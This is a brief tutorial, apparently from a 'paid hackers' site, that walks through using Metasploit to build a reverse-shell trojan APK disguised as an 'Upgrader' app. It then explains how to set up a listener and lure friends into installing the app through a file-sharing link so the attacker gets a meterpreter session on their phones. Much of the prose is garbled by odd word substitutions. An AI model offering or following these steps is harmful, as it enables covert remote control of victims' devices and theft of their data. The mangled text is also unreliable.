How to Hack Android Using Kali (Remotely) using metasploit - By Paid Hackers

How to Hack Android Using Kali (Remotely) using metasploit - By Paid Hackers'''

 

android hacking using metasploit
Step 1: open Kali: 

Open a terminal, and make a Trojan .apk

You can do this by writing :

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R /root/Upgrader.apk (replace LHOST with your own IP) 

You can likewise hack android on WAN i.e. through Interet by utilizing your Public/External IP in the LHOST and by port forwarding.

Step 2: Open Another Terminal:

Open another terminal until the file is being  produced.

Load metasploit console, by typing : msfconsole 

Step 3: Set-Up a Listener: 

After it loads(it will take some time), load the multi-handler exploit by writing :
use exploit/multi/handler 

Set up a (reverse) payload by writing : set payload android/meterpreter/reverse_tcp

To set L host type : set  LHOST 192.168.0.4 (Even in the event that you are hacking on WAN sort your private/inner IP here not the general public/external)

Step 4: Exploit! 

Finally type: exploit to begin the listener.

copy the application that you made (Upgrader.apk) from the root folder, to you android phone.

At that point send it utilizing Uploading it to Dropbox or any offering site (like: www.speedyshare.com).

At that point send the link that the Website offered you to your companions and adventure their telephones (Only on LAN, however in the event that you utilized the WAN system then you can utilize the exploit anyplace on the INTERNET)

Let the Victim install the Upgrader app(as he would think it is intended to overhaul a few highlights on his telephone)

On the other hand, the alternative of recompense for Installation of applications from Unknown Sources ought to be empowered (if not) from the security settings of the android telephone to permit the Trojan to introduce.

Furthermore, when he clicks Open...

Step 5: BOOM! 

There comes the meterpreter prompt:

- -HACKED - -